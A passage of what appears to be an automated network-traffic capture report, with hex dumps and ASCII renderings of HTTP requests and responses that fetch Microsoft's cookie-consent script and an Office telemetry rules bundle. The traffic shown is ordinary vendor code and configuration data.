                                                                                                                                                                                  Data Ascii: a(e[mv])),e[lv]&&(e[lv]=ea(e[lv])))}function a(e,t){if(e[yv]||(e[yv]=0),e[Cv]||(e[Cv]=1),l(e),e[bv])if(U||ae)e[Cv]=3,e[bv]=!1;else if(H)return W&&(e=ea(e)),H[rv](Ev.create(e[Ig],[e]),!0===e[bv]?1:e[bv],3);var n=e[Cv],r=ce,i=R,a=(4===n&&(r=oe,i=O),!1);r<i?


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                  12192.168.2.44976713.107.246.634438176C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:46:57 UTC551OUTGET /mscc/lib/v2/wcp-consent.js HTTP/1.1
                                                                                                                                                                                  Host: wcpstatic.microsoft.com
                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                  Sec-Fetch-Site: same-site
                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                                                                                  Referer: https://learn.microsoft.com/
                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                  2024-11-23 13:46:58 UTC713INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:46:57 GMT
                                                                                                                                                                                  Content-Type: application/javascript
                                                                                                                                                                                  Content-Length: 52717
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                  Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                                  Age: 24083
                                                                                                                                                                                  Cache-Control: max-age=43200
                                                                                                                                                                                  Content-MD5: QT/MdZzBmCG2G2lBgIsptQ==
                                                                                                                                                                                  Etag: 0x8DA85F6F74C6D08
                                                                                                                                                                                  Last-Modified: Wed, 24 Aug 2022 17:34:58 GMT
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  X-Cache: CONFIG_NOCACHE
                                                                                                                                                                                  x-ms-blob-type: BlockBlob
                                                                                                                                                                                  x-ms-lease-status: unlocked
                                                                                                                                                                                  x-ms-request-id: 3774b461-701e-003c-4476-3de918000000
                                                                                                                                                                                  x-ms-version: 2009-09-19
                                                                                                                                                                                  x-azure-ref: 20241123T134657Z-178bfbc474bfw4gbhC1NYCunf400000004g000000000czw6
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:46:58 UTC15671INData Raw: 76 61 72 20 57 63 70 43 6f 6e 73 65 6e 74 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 7b 32 32 39 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 77 69 6e 64 6f 77 2c 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 6f 28 6e 29 7b 69 66 28 74 5b 6e 5d 29 72 65 74 75 72 6e 20 74 5b 6e 5d 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 72 3d 74 5b 6e 5d 3d 7b 69 3a 6e 2c 6c 3a 21 31 2c 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 72 65 74 75 72 6e 20 65 5b 6e 5d 2e 63 61 6c 6c 28 72 2e 65 78 70 6f 72 74 73 2c 72 2c 72 2e 65 78 70 6f 72 74 73 2c 6f 29 2c 72 2e 6c 3d 21 30 2c 72 2e 65 78 70 6f 72 74 73 7d 72 65 74 75 72 6e 20 6f 2e 6d 3d 65 2c 6f 2e 63 3d 74 2c 6f 2e 64 3d 66 75 6e 63 74 69 6f 6e 28 65
                                                                                                                                                                                  Data Ascii: var WcpConsent;!function(){var e={229:function(e){window,e.exports=function(e){var t={};function o(n){if(t[n])return t[n].exports;var r=t[n]={i:n,l:!1,exports:{}};return e[n].call(r.exports,r,r.exports,o),r.l=!0,r.exports}return o.m=e,o.c=t,o.d=function(e
                                                                                                                                                                                  2024-11-23 13:46:58 UTC16384INData Raw: 29 7b 72 65 74 75 72 6e 20 65 3f 65 2e 72 65 70 6c 61 63 65 28 2f 26 2f 67 2c 22 26 61 6d 70 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 3c 2f 67 2c 22 26 6c 74 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 3e 2f 67 2c 22 26 67 74 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 22 2f 67 2c 22 26 71 75 6f 74 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 27 2f 67 2c 22 26 23 30 33 39 3b 22 29 3a 22 22 7d 2c 65 7d 28 29 2c 61 3d 6e 2e 6c 6f 63 61 6c 73 2c 6c 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 65 2c 74 2c 6f 2c 6e 2c 72 2c 69 2c 61 29 7b 74 68 69 73 2e 64 69 72 65 63 74 69 6f 6e 3d 22 6c 74 72 22 2c 74 68 69 73 2e 70 72 65 76 69 6f 75 73 46 6f 63 75 73 45 6c 65 6d 65 6e 74 42 65 66 6f 72 65 50 6f 70 75 70 3d 6e 75 6c 6c 2c 74 68 69 73 2e 63 6f 6f 6b 69
                                                                                                                                                                                  Data Ascii: ){return e?e.replace(/&/g,"&amp;").replace(/</g,"&lt;").replace(/>/g,"&gt;").replace(/"/g,"&quot;").replace(/'/g,"&#039;"):""},e}(),a=n.locals,l=function(){function e(e,t,o,n,r,i,a){this.direction="ltr",this.previousFocusElementBeforePopup=null,this.cooki
                                                                                                                                                                                  2024-11-23 13:46:58 UTC16384INData Raw: 6f 72 22 5d 2b 22 20 21 69 6d 70 6f 72 74 61 6e 74 3b 5c 6e 20 20 20 20 20 20 20 20 7d 22 2c 74 2b 3d 27 69 6e 70 75 74 5b 74 79 70 65 3d 22 72 61 64 69 6f 22 5d 2e 27 2b 63 2e 63 6f 6f 6b 69 65 49 74 65 6d 52 61 64 69 6f 42 74 6e 2b 22 20 2b 20 6c 61 62 65 6c 3a 68 6f 76 65 72 3a 3a 61 66 74 65 72 20 7b 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 22 2b 65 5b 22 72 61 64 69 6f 2d 62 75 74 74 6f 6e 2d 68 6f 76 65 72 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 22 5d 2b 22 20 21 69 6d 70 6f 72 74 61 6e 74 3b 5c 6e 20 20 20 20 20 20 20 20 7d 22 2c 74 2b 3d 27 69 6e 70 75 74 5b 74 79 70 65 3d 22 72 61 64 69 6f 22 5d 2e 27 2b 63 2e 63 6f 6f 6b 69 65 49 74 65 6d 52 61 64 69 6f 42 74 6e 2b 22 20 2b 20 6c
                                                                                                                                                                                  Data Ascii: or"]+" !important;\n }",t+='input[type="radio"].'+c.cookieItemRadioBtn+" + label:hover::after {\n background-color: "+e["radio-button-hover-background-color"]+" !important;\n }",t+='input[type="radio"].'+c.cookieItemRadioBtn+" + l
                                                                                                                                                                                  2024-11-23 13:46:58 UTC4278INData Raw: 65 6d 65 6e 74 42 79 49 64 28 22 77 63 70 43 6f 6e 73 65 6e 74 42 61 6e 6e 65 72 43 74 72 6c 22 29 7d 2c 65 2e 65 6d 69 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 5b 5d 2c 6f 3d 31 3b 6f 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 6f 2b 2b 29 74 5b 6f 2d 31 5d 3d 61 72 67 75 6d 65 6e 74 73 5b 6f 5d 3b 76 61 72 20 6e 3d 74 68 69 73 2e 65 76 65 6e 74 73 5b 65 5d 3b 6e 26 26 6e 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 74 29 7d 29 29 7d 2c 65 2e 70 72 6f 74 6f 74 79 70 65 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6f 29 7b 65 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3f 65 2e 61 64 64 45 76 65 6e 74
                                                                                                                                                                                  Data Ascii: ementById("wcpConsentBannerCtrl")},e.emit=function(e){for(var t=[],o=1;o<arguments.length;o++)t[o-1]=arguments[o];var n=this.events[e];n&&n.forEach((function(e){e.apply(null,t)}))},e.prototype.addEventListener=function(e,t,o){e.addEventListener?e.addEvent


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                  13192.168.2.44977113.107.246.634438176C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:47:00 UTC373OUTGET /mscc/lib/v2/wcp-consent.js HTTP/1.1
                                                                                                                                                                                  Host: wcpstatic.microsoft.com
                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                  2024-11-23 13:47:01 UTC713INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:47:00 GMT
                                                                                                                                                                                  Content-Type: application/javascript
                                                                                                                                                                                  Content-Length: 52717
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                  Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                                  Age: 24086
                                                                                                                                                                                  Cache-Control: max-age=43200
                                                                                                                                                                                  Content-MD5: QT/MdZzBmCG2G2lBgIsptQ==
                                                                                                                                                                                  Etag: 0x8DA85F6F74C6D08
                                                                                                                                                                                  Last-Modified: Wed, 24 Aug 2022 17:34:58 GMT
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  X-Cache: CONFIG_NOCACHE
                                                                                                                                                                                  x-ms-blob-type: BlockBlob
                                                                                                                                                                                  x-ms-lease-status: unlocked
                                                                                                                                                                                  x-ms-request-id: 3774b461-701e-003c-4476-3de918000000
                                                                                                                                                                                  x-ms-version: 2009-09-19
                                                                                                                                                                                  x-azure-ref: 20241123T134700Z-15b8b599d88qw29phC1TEB5zag000000033g0000000007p5
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:47:01 UTC16384INData Raw: 76 61 72 20 57 63 70 43 6f 6e 73 65 6e 74 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 7b 32 32 39 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 77 69 6e 64 6f 77 2c 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 6f 28 6e 29 7b 69 66 28 74 5b 6e 5d 29 72 65 74 75 72 6e 20 74 5b 6e 5d 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 72 3d 74 5b 6e 5d 3d 7b 69 3a 6e 2c 6c 3a 21 31 2c 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 72 65 74 75 72 6e 20 65 5b 6e 5d 2e 63 61 6c 6c 28 72 2e 65 78 70 6f 72 74 73 2c 72 2c 72 2e 65 78 70 6f 72 74 73 2c 6f 29 2c 72 2e 6c 3d 21 30 2c 72 2e 65 78 70 6f 72 74 73 7d 72 65 74 75 72 6e 20 6f 2e 6d 3d 65 2c 6f 2e 63 3d 74 2c 6f 2e 64 3d 66 75 6e 63 74 69 6f 6e 28 65
                                                                                                                                                                                  Data Ascii: var WcpConsent;!function(){var e={229:function(e){window,e.exports=function(e){var t={};function o(n){if(t[n])return t[n].exports;var r=t[n]={i:n,l:!1,exports:{}};return e[n].call(r.exports,r,r.exports,o),r.l=!0,r.exports}return o.m=e,o.c=t,o.d=function(e
                                                                                                                                                                                  2024-11-23 13:47:01 UTC16382INData Raw: 2d 6c 61 62 65 6c 3d 22 27 2b 69 2e 65 73 63 61 70 65 48 74 6d 6c 28 74 68 69 73 2e 74 65 78 74 52 65 73 6f 75 72 63 65 73 2e 70 72 65 66 65 72 65 6e 63 65 73 44 69 61 6c 6f 67 43 6c 6f 73 65 4c 61 62 65 6c 29 2b 27 22 20 63 6c 61 73 73 3d 22 27 2b 61 2e 63 6c 6f 73 65 4d 6f 64 61 6c 49 63 6f 6e 2b 27 22 20 74 61 62 69 6e 64 65 78 3d 22 30 22 3e 26 23 78 32 37 31 35 3b 3c 2f 62 75 74 74 6f 6e 3e 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 72 6f 6c 65 3d 22 64 6f 63 75 6d 65 6e 74 22 20 63 6c 61 73 73 3d 22 27 2b 61 2e 6d 6f 64 61 6c 42 6f 64 79 2b 27 22 3e 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 3e 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 20 63 6c 61 73 73 3d 22 27 2b 61 2e 6d 6f 64
                                                                                                                                                                                  Data Ascii: -label="'+i.escapeHtml(this.textResources.preferencesDialogCloseLabel)+'" class="'+a.closeModalIcon+'" tabindex="0">&#x2715;</button>\n <div role="document" class="'+a.modalBody+'">\n <div>\n <h1 class="'+a.mod
                                                                                                                                                                                  2024-11-23 13:47:01 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 22 2b 65 5b 22 72 61 64 69 6f 2d 62 75 74 74 6f 6e 2d 64 69 73 61 62 6c 65 64 2d 63 6f 6c 6f 72 22 5d 2b 22 20 21 69 6d 70 6f 72 74 61 6e 74 3b 5c 6e 20 20 20 20 20 20 20 20 7d 22 7d 2c 65 7d 28 29 2c 64 3d 5b 22 61 72 22 2c 22 68 65 22 2c 22 70 73 22 2c 22 75 72 22 2c 22 66 61 22 2c 22 70 61 22 2c 22 73 64 22 2c 22 74 6b 22 2c 22 75 67 22 2c 22 79 69 22 2c 22 73 79 72 22 2c 22 6b 73 2d 61 72 61 62 22 5d 2c 75 3d 7b 22 63 6c 6f 73 65 2d 62 75 74 74 6f 6e 2d 63 6f 6c 6f 72 22 3a 22 23 36 36 36 36 36 36 22 2c 22 73 65 63 6f 6e 64 61 72 79 2d 62 75 74 74 6f 6e 2d 64 69 73 61 62 6c 65 64 2d 6f 70 61 63 69 74 79 22 3a 22 31 22 2c 22 73 65 63 6f 6e 64 61 72 79 2d 62 75 74 74 6f
                                                                                                                                                                                  Data Ascii: background-color: "+e["radio-button-disabled-color"]+" !important;\n }"},e}(),d=["ar","he","ps","ur","fa","pa","sd","tk","ug","yi","syr","ks-arab"],u={"close-button-color":"#666666","secondary-button-disabled-opacity":"1","secondary-butto
                                                                                                                                                                                  2024-11-23 13:47:01 UTC3567INData Raw: 28 22 2d 22 29 5b 30 5d 3b 6f 3d 65 2e 73 70 6c 69 74 28 22 2d 22 29 5b 30 5d 3d 3d 3d 6e 7d 72 65 74 75 72 6e 20 6f 7d 28 65 2c 63 29 7d 29 29 3b 73 26 26 30 3d 3d 3d 73 2e 6c 65 6e 67 74 68 26 26 28 65 3d 22 65 6e 2d 55 53 22 29 2c 6f 2e 70 6c 61 63 65 68 6f 6c 64 65 72 45 6c 65 6d 65 6e 74 3d 6c 2c 72 26 26 6f 2e 63 6f 6e 73 65 6e 74 43 68 61 6e 67 65 64 43 61 6c 6c 62 61 63 6b 73 2e 72 65 67 69 73 74 65 72 43 61 6c 6c 62 61 63 6b 28 72 29 2c 6f 2e 73 61 76 65 43 6f 6f 6b 69 65 28 29 2c 6f 2e 73 69 74 65 43 6f 6e 73 65 6e 74 3d 6e 65 77 20 66 28 21 31 29 2c 6e 75 6c 6c 3d 3d 6e 7c 7c 6e 28 76 6f 69 64 20 30 2c 6f 2e 73 69 74 65 43 6f 6e 73 65 6e 74 29 2c 6f 2e 69 73 49 6e 69 74 52 65 61 64 79 3d 21 30 2c 74 68 69 73 2e 63 6f 6e 73 65 6e 74 43 68 61 6e
                                                                                                                                                                                  Data Ascii: ("-")[0];o=e.split("-")[0]===n}return o}(e,c)}));s&&0===s.length&&(e="en-US"),o.placeholderElement=l,r&&o.consentChangedCallbacks.registerCallback(r),o.saveCookie(),o.siteConsent=new f(!1),null==n||n(void 0,o.siteConsent),o.isInitReady=!0,this.consentChan


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  14192.168.2.44977413.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:47:00 UTC195OUTGET /rules/other-Win32-v19.bundle HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:47:01 UTC471INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:47:01 GMT
                                                                                                                                                                                  Content-Type: text/plain
                                                                                                                                                                                  Content-Length: 218853
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: public
                                                                                                                                                                                  Last-Modified: Fri, 22 Nov 2024 01:49:48 GMT
                                                                                                                                                                                  ETag: "0x8DD0A97F285E80B"
                                                                                                                                                                                  x-ms-request-id: ac3306f4-b01e-00ab-523b-3ddafd000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134700Z-15b8b599d88cn5thhC1TEBqxkn00000002zg000000002nw3
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:47:01 UTC15913INData Raw: 31 30 30 30 76 35 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 52 75 6c 65 45 72 72 6f 72 73 41 67 67 72 65 67 61 74 65 64 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 53 3d 22 37 30 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20
                                                                                                                                                                                  Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
                                                                                                                                                                                  2024-11-23 13:47:01 UTC16384INData Raw: 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 42 22 20 49 3d 22 35 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20
                                                                                                                                                                                  Data Ascii: /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L> <S T="1" F="0" /> </L> <R> <V V="400" T="I32" />
                                                                                                                                                                                  2024-11-23 13:47:01 UTC16384INData Raw: 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 38 32 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 6f 6e 74 61 63 74 43 61 72 64 50 72 6f 70 65 72 74 69 65 73 43 6f 75 6e 74 73 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31 33 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 68 75 74 64 6f 77 6e 22 20 2f 3e 0d
                                                                                                                                                                                  Data Ascii: .0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryShutdown" />
                                                                                                                                                                                  2024-11-23 13:47:01 UTC16384INData Raw: 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 39 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 41 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 31 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 46 69 6c 65 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 38 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20
                                                                                                                                                                                  Data Ascii: </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" /> </C> <C T="U32" I="11" O="true" N="File_Count"> <S T="8" F="Count" /> </C>
                                                                                                                                                                                  2024-11-23 13:47:01 UTC16384INData Raw: 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 4d 61 6e 61 67 65 72 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 52 65 73 75 6c 74 5f 56 61 6c 69 64 50 65 72 73 6f 6e 61 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 32 22 20 2f 3e 0d 0a 20
                                                                                                                                                                                  Data Ascii: <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32" I="2" O="false" N="Count_CreateResult_ValidPersona_False"> <C> <S T="12" />
                                                                                                                                                                                  2024-11-23 13:47:01 UTC16384INData Raw: 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 57 61 73 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6c 65 61 6e 75 70 4d 73 6f 50 65 72 73 6f 6e 61 5f 49 4d 73 6f 50 65 72 73 6f 6e
                                                                                                                                                                                  Data Ascii: Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" N="Paint_IMsoPersona_Null_Count"> <C> <S T="33" /> </C> </C> <C T="U32" I="21" O="false" N="CleanupMsoPersona_IMsoPerson
                                                                                                                                                                                  2024-11-23 13:47:01 UTC16384INData Raw: 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 30 30 22 20 54 3d 22 49 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22
